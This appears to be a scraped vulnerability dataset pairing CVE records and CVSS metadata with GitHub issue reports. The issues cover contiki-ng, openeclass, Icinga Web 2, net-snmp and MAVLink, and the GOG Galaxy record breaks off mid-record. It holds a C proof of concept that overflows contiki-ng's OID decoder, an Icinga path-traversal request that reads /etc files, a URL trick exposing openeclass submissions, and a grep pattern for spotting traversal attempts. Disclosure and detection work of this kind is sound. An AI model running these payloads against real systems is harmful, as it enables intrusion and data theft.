*oid)` OID copy and encode functions rely on the fact that the decoded OID has been terminated with a null-termination value without verification of the targete buffers capacity. This makes both of the functions vulnerable to similar out-ouf-bounds writes. **Type:** - Out-of-bounds memory read - Out-of-bounds memory write **Result:** - Memory corruption - Memory write to areas after the target buffer end with arbitrary data #### Target(s) affected by this defect ? - contiki-ng v4.5 - contiki-ng v4.4 #### Fix Rudimentary fix to address the most critical aspect of the issue: https://github.com/mjurczak/contiki-ng/tree/bugfix/snmp-engine #### How is this defect reproduced ? Example code demonstrating memory buffer overflow when decoding OID: ```c #include <stdint.h> #include <string.h> #include "snmp-oid.h" static uint8_t test_oid1[] = {0x06,0x08,0x2B,0x06,0x01,0x02,0x01,0x01,0x02,0x00}; static uint8_t test_oid2[] = {0x06,0x27,0x2B,0x06, 0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01, 0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01, /*Buffer capacity limit*/ 0x86,0xE3,0xB1,0xCA,0xC8,0x86,0xE3,0xB1,0xCA,0xC8, 0x86,0xE3,0xB1,0xCA,0xC8,0x86,0xE3,0xB1,0xCA,0xC8, 0x00}; static uint32_t test_oid1_len = sizeof(test_oid1); static uint32_t test_oid2_len = sizeof(test_oid2); void print_hex(char *data, size_t data_len) { while(data_len--) { printf("%02hhX", *data++); } printf("\r\n"); } int main(int argc, const char* argv[]) { uint8_t *ret; uint32_t oid1_len = 0; uint32_t oid2_len = 0; uint32_t oid1[SNMP_MSG_OID_MAX_LEN]; uint32_t oid2[SNMP_MSG_OID_MAX_LEN]; char text[] = "This is a very important stack variable."; printf("VALID OID:\r\n"); ret = snmp_oid_decode_oid(test_oid1, &test_oid1_len, oid1, &oid1_len); printf("returned ptr = %p\r\n", ret); printf("Decoded oid length: %d\r\n", oid1_len); print_hex(text, sizeof(text)); printf("BAD OID:\r\n"); ret = snmp_oid_decode_oid(test_oid2, &test_oid2_len, oid2, &oid2_len); printf("returned ptr = %p\r\n", ret); printf("Decoded oid length: %d\r\n", oid2_len); print_hex(text, sizeof(text)); return 0; } ```
Out of bounds memory read/write in SNMP agent
https://api.github.com/repos/contiki-ng/contiki-ng/issues/1351/comments
1
2020-08-17T19:24:47Z
2020-11-25T18:28:24Z
https://github.com/contiki-ng/contiki-ng/issues/1351
680,472,406
1,351
1,388
CVE-2020-24381
2020-08-19T12:15:11.340
GUnet Open eClass Platform (aka openeclass) before 3.11 might allow remote attackers to read students' submitted assessments because it does not ensure that the web server blocks directory listings, and the data directory is inside the web root by default.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://emaragkos.gr/cve-2020-24381/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gunet/openeclass/issues/39" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://emaragkos.gr/cve-2020-24381/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gunet/openeclass/issues/39" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gunet:open_eclass_platform:*:*:*:*:*:*:*:*", "matchCriteriaId": "59A23733-2777-4642-A2E1-35AC63B031A3", "versionEndExcluding": "3.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "200" ]
200
https://github.com/gunet/openeclass/issues/39
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gunet", "openeclass" ]
**Improper Access Control by Directory Listing Misconfiguration that affects all versions** When the webapp is poorly configured (directory listing is enabled), an unauthenticated remote attacker will be able to read students' submitted assessments because it does not ensure that the web server blocks directory listing. CVE-2020-24381 [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24381](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24381) [https://nvd.nist.gov/vuln/detail/CVE-2020-24381]() PoC: Course link https://127.0.0.1/courses/CS101 Add "work" directory at the end https://127.0.0.1/courses/CS101/work/ ![1](https://user-images.githubusercontent.com/13789107/91101625-259d1a80-e670-11ea-8fdc-68c407a79c23.jpg) ![2](https://user-images.githubusercontent.com/13789107/91101628-2766de00-e670-11ea-89d7-7810d4e0aade.png) ![3](https://user-images.githubusercontent.com/13789107/91101631-28980b00-e670-11ea-851b-8345e915bd76.jpg)
Improper Access Control by Directory Listing Misconfiguration
https://api.github.com/repos/gunet/openeclass/issues/39/comments
7
2020-08-17T16:03:50Z
2021-05-23T21:16:23Z
https://github.com/gunet/openeclass/issues/39
680,346,433
39
1,389
CVE-2020-24368
2020-08-19T15:15:12.620
Icinga Icinga Web2 2.0.0 through 2.6.4, 2.7.4 and 2.8.2 has a Directory Traversal vulnerability which allows an attacker to access arbitrary files that are readable by the process running Icinga Web 2. This issue is fixed in Icinga Web 2 in v2.6.4, v2.7.4 and v2.8.2.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00026.html" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/Icinga/icingaweb2/blob/master/CHANGELOG.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Icinga/icingaweb2/issues/4226" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://icinga.com/2020/08/19/icinga-web-security-release-v2-6-4-v2-7-4-and-v2-8-2/" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00040.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202208-05" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4747" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00026.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/Icinga/icingaweb2/blob/master/CHANGELOG.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Icinga/icingaweb2/issues/4226" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://icinga.com/2020/08/19/icinga-web-security-release-v2-6-4-v2-7-4-and-v2-8-2/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00040.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202208-05" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4747" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:icinga:icinga_web_2:*:*:*:*:*:*:*:*", "matchCriteriaId": "ECF58CFB-8102-44AC-8089-05199B4B751C", "versionEndExcluding": "2.6.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:icinga:icinga_web_2:*:*:*:*:*:*:*:*", "matchCriteriaId": "1674480E-B24C-4E01-8DAA-56DF162377A4", "versionEndExcluding": "2.7.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.7.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:icinga:icinga_web_2:*:*:*:*:*:*:*:*", "matchCriteriaId": "09DAF5BB-7F3F-4F2E-B5CE-169DF46584A7", "versionEndExcluding": "2.8.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.8.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10:*:*:*:*:*:*:*", "matchCriteriaId": "3AA94636-56D9-400F-9B7C-6548CF182EB5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:suse:package_hub:-:*:*:*:*:*:*:*", "matchCriteriaId": "284A8DA0-317B-4BBE-AECB-7E91BBF0DD3B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:suse:linux_enterprise:12.0:*:*:*:*:*:*:*", "matchCriteriaId": "CBC8B78D-1131-4F21-919D-8AC79A410FB9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "22" ]
22
https://github.com/Icinga/icingaweb2/issues/4226
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Icinga", "icingaweb2" ]
The vulnerability in question allows an attacker to access arbitrary files which are readable by the process running Icinga Web 2. (This is usually the web server or fpm process) To exploit this vulnerability the attacker has to acquire the following knowledge: - The URI at which Icinga Web 2 is accessible - An installed additional (non-core) module, which can be leveraged (Subject to trial-and-error) - The module's install path (Subject to common knowledge and trial-and-error) A valid user login is NOT required. The attack is performed by sending a HTTP GET or POST request to a particular route of Icinga Web 2. The request has to include the module's name and the desired (relative) file path. Example: - Icinga Web 2 is accessible at /icingaweb2 - The business process module is installed and enabled - The module is installed at /usr/share/icingaweb2/modules Applicable request to access /etc: "GET /icingaweb2/static/img?module_name=businessprocess&file=../../../../../../../etc/os-release" ## Since when does it exist? Since the initial 2.0.0 stable release. ## Am I affected? If you had already been a victim of this vulnerability can only be verified by inspecting the web server's access log. Manifestations of such a request in the access log can be identified with this command: `grep -Pie '(?<=GET|POST ).+/static/img?(.*file=((\.|%2e)(\.|%2e)(/|%2f)){3,}\S*| )' access.log​` ## Which modules can be leveraged? Known and publicly available modules: - https://github.com/Icinga/icingaweb2-module-businessprocess - https://github.com/Icinga/icingaweb2-module-director - https://github.com/Icinga/icingaweb2-module-reporting - https://github.com/nbuchwitz/icingaweb2-module-map - https://github.com/Mikesch-mp/icingaweb2-module-globe We would like to emphasize that a module itself is **NOT** the cause nor affected. None of the listed modules require a fix in this regard.
Possible path traversal when serving static image files
https://api.github.com/repos/Icinga/icingaweb2/issues/4226/comments
0
2020-08-14T12:33:43Z
2020-08-19T09:02:24Z
https://github.com/Icinga/icingaweb2/issues/4226
679,127,062
4,226
1,390
CVE-2020-15861
2020-08-20T01:17:13.837
Net-SNMP through 5.7.3 allows Escalation of Privileges because of UNIX symbolic link (symlink) following.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=966599" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/net-snmp/net-snmp/commit/4fd9a450444a434a993bc72f7c3486ccce41f602" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/net-snmp/net-snmp/issues/145" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202008-12" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200904-0001/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4471-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=966599" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/net-snmp/net-snmp/commit/4fd9a450444a434a993bc72f7c3486ccce41f602" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/net-snmp/net-snmp/issues/145" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202008-12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200904-0001/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4471-1/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:net-snmp:net-snmp:*:*:*:*:*:*:*:*", "matchCriteriaId": "8BD5C233-45FA-4501-8EA4-C28EC33E7460", "versionEndExcluding": null, "versionEndIncluding": "5.7.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*", "matchCriteriaId": "CB66DB75-2B16-4EBF-9B93-CE49D8086E41", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "matchCriteriaId": "815D70A8-47D3-459C-A32C-9FEACA0659D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*", "matchCriteriaId": "902B8056-9E37-443B-8905-8AA93E2447FB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*", "matchCriteriaId": "5C2089EE-5D7F-47EC-8EA5-0F69790564C4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:smi-s_provider:-:*:*:*:*:*:*:*", "matchCriteriaId": "4BB0FDCF-3750-44C6-AC5C-0CC2AAD14093", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:solidfire_\\&_hci_management_node:-:*:*:*:*:*:*:*", "matchCriteriaId": "D6D700C5-F67F-4FFB-BE69-D524592A3D2E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "59" ]
59
https://github.com/net-snmp/net-snmp/issues/145
[ "Third Party Advisory" ]
github.com
[ "net-snmp", "net-snmp" ]
Dear all, In the course of a penetration test performed by our security analysts, we have noticed some security vulnerabilities in net-snmp. Your deprecated bug tracker (http://www.net-snmp.org/bugs/) redirects to Github. Sadly, Github does not support creating private issues for security relevant bugs. We would like to send you the findings in an encrypted manner to enable you to mitigate them. For encrypted communication, we can offer a web-based platform hosted by us, or we can offer to encrypt our e-mails via S/MIME or PGP. Please let us know which method fits you best. In order to transmit our findings via email, we will need either a public S/MIME certificate or your public PGP key of an active and trustworthy contributor of this project. As stated in our Responsible Disclosure Guideline (see https://www.usd.de/wp-content/uploads/2017/10/usd-Responsible-Disclosure-EN.pdf), we will treat the vulnerabilities as confidential. We will grant you a time frame of 60 days to release a patch. After that deadline, we will reserve the right to publish the vulnerabilities. Sincerely, usd responsible disclosure team ________________________________________ About usd AG usd AG protects companies from hackers and criminals. As an accredited auditor, we consult and certify companies worldwide. Our work is as dynamic and diverse as current threats. We review IT systems, applications and processes for security vulnerabilities and help with their mitigation. With our Security Trainings, we raise security awareness; the CST Academy promotes an active dialogue and a transfer of knowledge. www.usd.de more security. usd .......................................................................... Registered office: 63263 Neu-Isenburg Local court of Offenbach: HRB 34667 Executive Board: Andreas Duchmann, Manfred Tubach (CEO) Chairman supervisory board: Dr. Dietmar Kirchner VAT ID: DE 163774242 ..........................................................................
[Ticket#2020070701000015] Security issues in net-snmp
https://api.github.com/repos/net-snmp/net-snmp/issues/145/comments
8
2020-07-09T09:32:21Z
2020-09-21T04:05:51Z
https://github.com/net-snmp/net-snmp/issues/145
653,914,163
145
1,391
CVE-2020-10283
2020-08-20T09:15:11.140
The Micro Air Vehicle Link (MAVLink) protocol presents authentication mechanisms on its version 2.0 however according to its documentation, in order to maintain backwards compatibility, GCS and autopilot negotiate the version via the AUTOPILOT_VERSION message. Since this negotiation depends on the answer, an attacker may craft packages in a way that hints the autopilot to adopt version 1.0 of MAVLink for the communication. Given the lack of authentication capabilities in such version of MAVLink (refer to CVE-2020-10282), attackers may use this method to bypass authentication capabilities and interact with the autopilot directly.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "cve@aliasrobotics.com", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@aliasrobotics.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/3316" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/3316" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dronecode:micro_air_vehicle_link:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "F56CC677-E829-48A5-B01B-9B33F13C084B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "288" ]
288
https://github.com/aliasrobotics/RVD/issues/3316
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "aliasrobotics", "RVD" ]
```yaml id: 3316 title: 'RVD#3316: No authentication in MAVLink protocol' type: vulnerability description: The Micro Air Vehicle Link (MAVLink) protocol presents no authentication mechanism on its version 1.0 (nor authorization) whichs leads to a variety of attacks including identity spoofing, unauthorized access, PITM attacks and more. According to literature, version 2.0 optionally allows for package signing which mitigates this flaw. Another source mentions that MAVLink 2.0 only provides a simple authentication system based on HMAC. This implies that the flying system overall should add the same symmetric key into all devices of network. If not the case, this may cause a security issue, that if one of the devices and its symmetric key are compromised, the whole authentication system is not reliable. cwe: CWE-306 cve: CVE-2020-10282 keywords: - MAVLink - v1.0 - v2.0 - PX4 - Ardupilot system: "MAVLink: v1.0" vendor: "PX4" severity: rvss-score: 9.6 rvss-vector: RVSS:1.0/AV:AN/AC:L/PR:N/UI:N/S:U/Y:T/C:H/I:H/A:H/H:U severity-description: critical cvss-score: 9.8 cvss-vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H links: - https://arxiv.org/abs/1906.10641 - https://arxiv.org/abs/1905.00265 - https://ieeexplore.ieee.org/document/8425627 - https://www.researchgate.net/publication/335973981_Assessing_and_Exploiting_Security_Vulnerabilities_of_Unmanned_Aerial_Vehicles - https://link.springer.com/chapter/10.1007/978-981-13-8406-6_66 - https://www.esat.kuleuven.be/cosic/publications/article-2667.pdf - https://www.usenix.org/conference/usenixsecurity19/presentation/kim - https://docs.google.com/document/d/1ETle6qQRcaNWAmpG2wz0oOpFKSF_bcTmYMQvtTGI8ns/edit - https://docs.google.com/document/d/1upZ_KnEgK3Hk1j0DfSHl9AdKFMoSqkAQVeK8LsngvEU/edit - https://docs.google.com/document/d/1XtbD0ORNkhZ8eKrsbSIZNLyg9sFRXMXbsR2mp37KbIg/edit - https://github.com/PX4/Firmware/issues/13538#issuecomment-574281772 - https://github.com/rligocki/Diploma_thesis_px4 flaw: phase: unknown specificity: subject-specific architectural-location: platform code application: Flying vehicles and/or others using MAVLink protocol. subsystem: communication package: N/A languages: C, C++ date-detected: detected-by: detected-by-method: testing date-reported: '2020-06-30' reported-by: "Victor Mayoral Vilches (Alias Robotics)" reported-by-relationship: security researcher issue: https://github.com/aliasrobotics/RVD/issues/3316 reproducibility: always trace: N/A reproduction: N/A reproduction-image: N/A exploitation: description: Not available exploitation-image: Not available exploitation-vector: Not available exploitation-recipe: '' mitigation: description: MAVLink 2.0 includes signing capabilities which mitigate this issue. Signatures seem to be optional for backwards compatibility and https://arxiv.org/abs/1906.10641 confirms this matter. Proper mitigation should enforce signatures. pull-request: N/A date-mitigation: null ```
RVD#3316: No authentication in MAVLink protocol
https://api.github.com/repos/aliasrobotics/RVD/issues/3316/comments
22
2020-06-30T17:20:40Z
2021-11-04T16:22:48Z
https://github.com/aliasrobotics/RVD/issues/3316
648,358,479
3,316
1,392
CVE-2020-24574
2020-08-21T04:15:10.787
The client (aka GalaxyClientService.exe) in GOG GALAXY through 2.0.41 (as of 12:58 AM Eastern, 9/26/21) allows local privilege escalation from any authenticated user to SYSTEM by instructing the Windows service to execute arbitrary commands. This occurs because the attacker can inject a DLL into GalaxyClient.exe, defeating the TCP-based "trusted client" protection mechanism.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 6.9, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 3.4, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jtesta/gog_galaxy_client_service_poc" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jtesta/gog_galaxy_client_service_poc/issues/1#issuecomment-926932218" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.gog.com/galaxy" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.positronsecurity.com/blog/2020-08-13-gog-galaxy_client-local-privilege-escalation_deuce/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jtesta/gog_galaxy_client_service_poc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jtesta/gog_galaxy_client_service_poc/issues/1#issuecomment-926932218" }, { "source": 